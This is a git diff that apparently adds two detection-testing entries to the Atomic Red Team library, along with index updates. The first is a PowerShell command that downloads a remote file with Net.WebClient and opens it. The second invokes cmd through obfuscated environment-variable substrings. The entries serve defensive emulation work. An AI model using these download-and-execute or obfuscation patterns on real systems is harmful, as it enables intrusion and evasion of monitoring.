diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index f2257e0e..5705cb4a 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -860,6 +860,7 @@ command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca617
command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
+command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index b338da52..d4703978 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -528,6 +528,7 @@ command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download
command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 21b70104..f96bd50a 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1559,6 +1559,7 @@
- Atomic Test #12: svchost writing a file to a UNC path [windows]
- Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
- Atomic Test #14: whois file download [linux, macos]
+ - Atomic Test #15: File Download via PowerShell [windows]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index d85cc21e..dd913c70 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -960,6 +960,7 @@
- Atomic Test #11: OSTAP Worming Activity [windows]
- Atomic Test #12: svchost writing a file to a UNC path [windows]
- Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
+ - Atomic Test #15: File Download via PowerShell [windows]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #3: portproxy reg key [windows]
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 4f451fdb..6e49e660 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -65221,6 +65221,27 @@ command-and-control:
cleanup_command: 'rm -f #{output_file}
'
+ - name: File Download via PowerShell
+ auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2
+ description: 'Use PowerShell to download and write an arbitrary file from the
+ internet. Example is from the 2021 Threat Detection Report by Red Canary.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ target_remote_file:
+ description: File to download
+ type: string
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt
+ output_file:
+ description: File to write to
+ type: string
+ default: LICENSE.txt
+ executor:
+ command: "(New-Object Net.WebClient).DownloadString('#{target_remote_file}')
+ | Out-File #{output_file}; Invoke-Item #{output_file}\n"
+ name: powershell
T1090.001:
technique:
external_references:
diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml
index cbe28a3f..3c1952e2 100644
--- a/atomics/T1059.003/T1059.003.yaml
+++ b/atomics/T1059.003/T1059.003.yaml
@@ -52,3 +52,23 @@ atomic_tests:
cleanup_command: |
del "#{file_contents_path}"
name: command_prompt
+
+- name: Suspicious Execution via Windows Command Shell
+ auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20
+ description: |
+ Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary.
+ supported_platforms:
+ - windows
+ input_arguments:
+ output_file:
+ description: File to output to
+ type: string
+ default: hello.txt
+ input_message:
+ description: Message to write to file
+ type: string
+ default: Hello, from CMD!
+ executor:
+ command: |
+ %LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}
+ name: command_prompt
diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md
index caef3d08..57e0c326 100644
--- a/atomics/T1105/T1105.md
+++ b/atomics/T1105/T1105.md
@@ -32,6 +32,8 @@
- [Atomic Test #14 - whois file download](#atomic-test-14---whois-file-download)
+- [Atomic Test #15 - File Download via PowerShell](#atomic-test-15---file-download-via-powershell)
+
@@ -589,4 +591,38 @@ echo "Please install timeout and the whois package"
+
+
+
+## Atomic Test #15 - File Download via PowerShell
+Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 54a4daf1-71df-4383-9ba7-f1a295d8b6d2
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| target_remote_file | File to download | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt|
+| output_file | File to write to | string | LICENSE.txt|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}
+```
+
+
+
+
+
+
diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml
index c90158a6..7838f6a5 100644
--- a/atomics/T1105/T1105.yaml
+++ b/atomics/T1105/T1105.yaml
@@ -381,3 +381,23 @@ atomic_tests:
timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
cleanup_command: |
rm -f #{output_file}
+
+- name: File Download via PowerShell
+ auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2
+ description: |
+ Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.
+ supported_platforms:
+ - windows
+ input_arguments:
+ target_remote_file:
+ description: File to download
+ type: string
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt
+ output_file:
+ description: File to write to
+ type: string
+ default: LICENSE.txt
+ executor:
+ command: |
+ (New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}
+ name: powershell
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index bdecd84c..6b256736 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -732,3 +732,4 @@ c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08
b8e747c3-bdf7-4d71-bce2-f1df2a057406
a12b5531-acab-4618-a470-0dafb294a87a
d400090a-d8ca-4be0-982e-c70598a23de9
+54a4daf1-71df-4383-9ba7-f1a295d8b6d2